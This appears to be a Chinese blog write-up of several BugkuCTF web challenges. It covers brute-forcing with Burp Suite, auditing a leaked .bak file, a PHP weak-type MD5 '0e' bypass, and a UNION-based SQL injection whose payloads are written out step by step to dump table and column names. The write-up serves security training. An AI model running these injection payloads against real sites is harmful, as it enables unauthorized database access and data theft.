BugkuCTF-WEB部分题解(二)

最新推荐文章于 2024-08-03 16:17:07 发布
最新推荐文章于 2024-08-03 16:17:07 发布
阅读量568 收藏
点赞数 2
CC 4.0 BY-SA版权
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flying_bird2019/article/details/104709613

输入密码得到flag

这道题直接暴力破解
在使用Burp Suite时候设置完Number range 开始爆破出现错误Invalid number settings
百度得以下解决方法
在这里插入图片描述
解决问题后爆破得flag

备份是个好习惯

御剑扫描网站发现index.php.bak(后缀为.bak为备份文件)
访问** /index.php.bak **下载文件打开

审计代码

在这里插入图片描述

1.$_SERVER[‘REQUEST_URI’]

2.strstr()

3.substr()

4.str_replace()

5.parse_str()

分析

1.根据代码原页面输出的是变量key1和key2 MD5后的值
2.绕过str_replace(‘key’,$str) 变量名可取‘kkeyey1’和’kkeyey2’
3.判断需借助php弱类型进行MD5碰撞
在这里插入图片描述

(两个变量的值MD5后均为0E开头,php处理进行弱类型比较得0=0,结果为真)
在这里插入图片描述
更多关于MD5碰撞
以上分析部分借鉴大佬题解

成绩单(SQL注入)

随便输入一个参数
在这里插入图片描述
猜测应该是按表的索引查询(select …where id=’’)
尝试联合注入
id = ’ union select 1,2,3,4# //2,3,4有返回
注入
id = ’ union select 1,2,3,database()# //得到数据库名skctf_flag
在这里插入图片描述
接下来获取该数据库中的表
id = ’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# //得到两个表fl4g和sc
在这里插入图片描述
接下来获取fl4g表中的字段名
id = ’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g’# //敏感表名应加’ '否则应将其编码为十六进制(0x666c3467)绕过,得到字段skctf_flag
在这里插入图片描述
获取字段中的值
id = ’ union select 1,2,3,skctf_flag from fl4g# //得到flag
在这里插入图片描述
方法二 使用sqlmap 详情

秋名山老司机

题目要求在两秒内post返回算数的值
使用python模拟登录网站算出结果post返回
写一个python脚本

在这里插入图片描述
得到flag (可能不会一次性返回成功,需要尝试多次)

速度要快

在响应头里发现了:
在这里插入图片描述
据其他的writeup所说该flag为变化的
用python脚本模拟登录获取响应头的flag,base64解码后post提交

在这里插入图片描述
关于byte类型与str类型 见详情

Bugku CTF Web 解题报告(一)
qq_51090016的博客
01-24 1129
Web11-20题 刚接触ctf的菜鸡,突发奇想写博客,想记录一下自己的写题过程。至于前面十题。。。我舍不得bugku的金币再启动一次场景,只好从11题开始。 Web 11 网站被黑了 我擦,网站被黑了??我一菜鸡哪会解这么高大上的题。打开题目一开,还搞得挺炫酷 这咋办?鼠标右键点不了,F12一看也没啥。我这也太菜了,只好看看大佬怎么做,原来是要用御剑,只好照葫芦画瓢 果然有了,访问下面这个看看 盲猜123456。。果然不对。只好想到用bp爆破。可我还不会爆破啊。。只好搜一下教程现学现用。 跟着大佬.
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 7123
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugkuCTF WEB解题记录 1-5
aap49042的博客
08-06 403
写了一部分web题,算是把它最基础的一部分做了一遍,以后的几天将持续更新BugkuCTF WEB部分题解,为了不影响阅读,所以每五道题的题解以一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ web2 打开链接http://120.24.86.145:8002/web2/ 看到的是一个充满滑稽脸的网页 ,这个题目很简单 我们直接利用F12查看...
BugkuCTF题解——web2
cggwz的信息飞船
02-18 381
今天开始玩夺旗赛了。 开心、开心。 先来看这个水题。 先放一下题库地址吧: 题库 这个web2可以说是非常简单了,我们打开目标网页可以发现有很多的滑稽。。。。但这不是重点,我们只需要打开其网页源码,就可以发现我们要找的flag。 是不是很简单 这里也顺便介绍一下CTF吧。 就是夺旗赛,根据题目去寻找一串代码,而这串代码就是flag,也就是我们要找的旗,找到旗就算解题成功。 是不是很有意思?一起来试...
BugkuCTF-Reverse题入门逆向多解法
am_03的博客
08-28 779
补充:IDA里面十六进制转字符的快捷键:R 方法一 第一步PEID,这里可以看出程序是32位的 查壳:(无壳) 拖进IDA32分析: 先查看伪码:F5 找到main函数 发现有许多 mov 指令,66H 是 ‘f’,6CH 是 ‘l’,推测这就是 flag 的 ASCII 码值。 得到flag:flag{Re_1s_S0_C0OL} 方法 也可以用动态调试的方法。 动态调试这就需要用到 OD。先下一个断点,然后单步运行,看看栈里的变化。 例如,我就找个 0x00401475 的地址。 在 OD
【CTF WEB基础】POST-Bugku CTF题解及知识点
最新发布
yu_fly_fish的博客
08-03 734
一起变强!
BugkuCTF-WEB题login1
am_03的博客
08-29 1611
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
CTF之WEB(BUGku Ctf 1-7 题解
RBMan的博客
12-18 1626
这几天做的一些CTF之WEB方向的题,才入门所以会写一些心得。1~7题的心得,不喜勿喷。我会坚持下去的。 一.post和get请求方式的不同 1.get:较为简单,如果叫你输入数值的话,直接在URL后面加就行了。格式如下: www.123123123.com/?abc=ABC(所需要提交的参数) 2.post:需要使用火狐上的插件HackBar,先打开该插件,再打开网页,然后URL就会出现在上面的大框中。图片如下: 然后,在下面的框中输入需要的提交的参数,就可以了。 .关于get请求方式中遇到问题:
【CTF WEB基础】GET-Bugku CTF题解和知识点
yu_fly_fish的博客
08-03 1032
一起变强!
BugkuCTF-WEB部分题解(四)
flying_bird2019的博客
12-02 643
字符?正则? 关于正则表达式推荐一篇博客 正则表达式 <?php highlight_file('2.php'); $key='KEY{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ die('key is: '.$key); } ?> get参
【Bugku CTF】web解题记录
2302_78903258的博客
06-23 1871
记录我在Bugku CTF靶场中做的比赛真题,便于自己以后的复习。
BugkuCTF web题解
qq_37078651的博客
03-12 2913
1、简单 查看源码F12: 2、计算器 输入发现只能输入一个字符,遂查看源码修改maxlength值或者删掉。 3、web基础$_GET GET请求参数what==flag即可. 4、web基础$_POST 使用工具(我用的是hackbar)发送post请求 参数what=flag。 5、矛盾 $num=$_GET['num']; if(!is_nu...
BugkuCTF WEB前五题题解 莽就完事了
linchuzhu_的博客
06-18 938
第一次写题解多担待! 目录(一)web2()计算器(三)web基础$_GET(四)web基础$_POST方法一方法(五)矛盾 (一)web2 http://123.206.87.240:8002/web2/. 打开网页后是闪瞎眼的表情包,不过不要紧,直接F12查找flag。 完毕。 ()计算器 http://123.206.87.240:8002/yanzhengma/ 还是老样子,遇题先按F12,没有发现什么特殊的地方。 尝试在输入框中输入答案,发现只能输入一位数字。 接着在开发者工具中发现 出
Bugkuctf_web3题解wp
weixin_52653109的博客
12-10 386
题目考察知识点:①代码审计 ②**”get“请求指令** 话不多说,进入场景。 很明显what要等于flag才能得到真正得flag(别一来就想着F12,抓包,截包啥的了的。想太复杂了的????) 然后在网址那栏加上 /?what=flag (get请求,不懂就度娘) 得到flag flag{8fae28b041a31fa3d365fc623f68d3b8} 写wp不易,看官大人们,点个赞吧( •̀ ω •́ )✧ ...
Bugkuctf_web2题解wp
weixin_52653109的博客
12-09 526
题目考察知识点:web前端修改 进入场景,安装提示输入验证码。但是输入不了三位数!打开F12,发现问题所在! 鼠标双击修改“maxlength旁边的 1 ”。 输入验证码得到flag~
CTFWeb——Bugku秋名山老司机 详细题解
日熙的博客
08-19 3858
1
Bugkuctf_web12题解wp
weixin_52653109的博客
04-11 227
进入环境,一个登入系统。试了试万能密码,没登进去。 F12看一下源码有没有hint。发现一个base64编码。 在线解码。出来的应该是登入密码了。 但是试了试 “admin”+“test123”还是登不进去。 回看一下, 它说了“IP禁止访问,联系本地管理员” 那应该就是要用本地的ip才能登入了 所以,抓包,添加“X-forwarded-For:127.0.0.1” 改ip。 结果出来了 ...
CTF BugKu web类型题目详细解析
qq_68727073的博客
10-12 792
点击该页面的overview,使用bp抓一下包,发到重发器后构造payload,如图。
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值